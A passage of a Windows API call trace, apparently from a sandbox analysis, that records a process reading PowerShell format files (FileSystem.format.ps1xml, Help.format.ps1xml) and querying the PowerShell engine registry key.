	[0088.891] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.892] GetLastError () returned 0x0
	[0088.892] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.892] GetLastError () returned 0x0
	[0088.893] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.893] GetLastError () returned 0x0
	[0088.893] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.893] GetLastError () returned 0x0
	[0088.893] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x119, lpOverlapped=0x0) returned 1
	[0088.893] GetLastError () returned 0x0
	[0088.894] ReadFile (in: hFile=0x29c, lpBuffer=0x1886bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1886bdc*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.894] GetLastError () returned 0x0
	[0088.894] CloseHandle (hObject=0x29c) returned 1
	[0088.894] GetLastError () returned 0x0
	[0088.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0088.894] GetLastError () returned 0x0
	[0088.894] SetErrorMode (uMode=0x1) returned 0x1
	[0088.894] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18a7bd8 | out: lpFileInformation=0x18a7bd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0088.894] GetLastError () returned 0x0
	[0088.894] SetErrorMode (uMode=0x1) returned 0x1
	[0088.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0088.894] GetLastError () returned 0x0
	[0088.894] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0088.894] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.895] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.895] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0088.895] GetLastError () returned 0x0
	[0088.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0088.895] GetLastError () returned 0x0
	[0088.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.896] GetLastError () returned 0x0
	[0088.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.896] GetLastError () returned 0x0
	[0088.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.896] GetLastError () returned 0x0
	[0088.897] VirtualQuery (in: lpAddress=0x14d470, lpBuffer=0x14e470, dwLength=0x1c | out: lpBuffer=0x14e470*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.897] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd76b89ab, Data2=0xd5a5, Data3=0x4152, Data4=([0]=0xa0, [1]=0xba, [2]=0x3, [3]=0x62, [4]=0xe6, [5]=0xfe, [6]=0x29, [7]=0x44))) returned 0x0
	[0088.897] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.897] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x58195c0b, Data2=0xa774, Data3=0x4075, Data4=([0]=0xab, [1]=0xdb, [2]=0x21, [3]=0xae, [4]=0xd0, [5]=0x7b, [6]=0x70, [7]=0xeb))) returned 0x0
	[0088.898] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xab3f696a, Data2=0x4450, Data3=0x4398, Data4=([0]=0x83, [1]=0x37, [2]=0x9b, [3]=0x9a, [4]=0x77, [5]=0xc4, [6]=0xce, [7]=0x1b))) returned 0x0
	[0088.898] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd0d4b077, Data2=0x9095, Data3=0x4b2f, Data4=([0]=0x98, [1]=0xb3, [2]=0x26, [3]=0x2f, [4]=0x96, [5]=0x94, [6]=0xa2, [7]=0x13))) returned 0x0
	[0088.898] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.898] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0088.898] GetLastError () returned 0x0
	[0088.898] SetErrorMode (uMode=0x1) returned 0x1
	[0088.898] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0088.898] GetLastError () returned 0x0
	[0088.898] GetFileType (hFile=0x29c) returned 0x1
	[0088.898] SetErrorMode (uMode=0x1) returned 0x1
	[0088.898] GetFileType (hFile=0x29c) returned 0x1
	[0088.899] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.900] GetLastError () returned 0x0
	[0088.900] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.900] GetLastError () returned 0x0
	[0088.900] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.900] GetLastError () returned 0x0
	[0088.901] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.901] GetLastError () returned 0x0
	[0088.901] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.901] GetLastError () returned 0x0
	[0088.901] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.901] GetLastError () returned 0x0
	[0088.902] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.902] GetLastError () returned 0x0
	[0088.902] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.902] GetLastError () returned 0x0
	[0088.903] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.903] GetLastError () returned 0x0
	[0088.904] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.904] GetLastError () returned 0x0
	[0088.904] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.904] GetLastError () returned 0x0
	[0088.904] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.904] GetLastError () returned 0x0
	[0088.904] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.905] GetLastError () returned 0x0
	[0088.905] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.905] GetLastError () returned 0x0
	[0088.905] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.905] GetLastError () returned 0x0
	[0088.905] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.905] GetLastError () returned 0x0
	[0088.908] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.908] GetLastError () returned 0x0
	[0088.908] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.908] GetLastError () returned 0x0
	[0088.908] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.908] GetLastError () returned 0x0
	[0088.908] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.908] GetLastError () returned 0x0
	[0088.908] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.909] GetLastError () returned 0x0
	[0088.909] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.909] GetLastError () returned 0x0
	[0088.909] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.909] GetLastError () returned 0x0
	[0088.909] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.909] GetLastError () returned 0x0
	[0088.909] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.909] GetLastError () returned 0x0
	[0088.910] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.910] GetLastError () returned 0x0
	[0088.910] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.910] GetLastError () returned 0x0
	[0088.910] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.910] GetLastError () returned 0x0
	[0088.910] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.910] GetLastError () returned 0x0
	[0088.910] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.910] GetLastError () returned 0x0
	[0088.911] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.911] GetLastError () returned 0x0
	[0088.911] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.911] GetLastError () returned 0x0
	[0088.915] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.915] GetLastError () returned 0x0
	[0088.916] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.916] GetLastError () returned 0x0
	[0088.916] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.916] GetLastError () returned 0x0
	[0088.916] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.916] GetLastError () returned 0x0
	[0088.916] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.916] GetLastError () returned 0x0
	[0088.917] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.917] GetLastError () returned 0x0
	[0088.917] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.917] GetLastError () returned 0x0
	[0088.917] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.917] GetLastError () returned 0x0
	[0088.917] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.917] GetLastError () returned 0x0
	[0088.917] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.917] GetLastError () returned 0x0
	[0088.918] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.918] GetLastError () returned 0x0
	[0088.918] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.918] GetLastError () returned 0x0
	[0088.918] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.918] GetLastError () returned 0x0
	[0088.918] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.918] GetLastError () returned 0x0
	[0088.918] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.919] GetLastError () returned 0x0
	[0088.919] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.919] GetLastError () returned 0x0
	[0088.919] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.919] GetLastError () returned 0x0
	[0088.919] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.919] GetLastError () returned 0x0
	[0088.919] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.919] GetLastError () returned 0x0
	[0088.919] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.920] GetLastError () returned 0x0
	[0088.920] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.920] GetLastError () returned 0x0
	[0088.920] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.920] GetLastError () returned 0x0
	[0088.920] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.920] GetLastError () returned 0x0
	[0088.920] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.921] GetLastError () returned 0x0
	[0088.921] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.921] GetLastError () returned 0x0
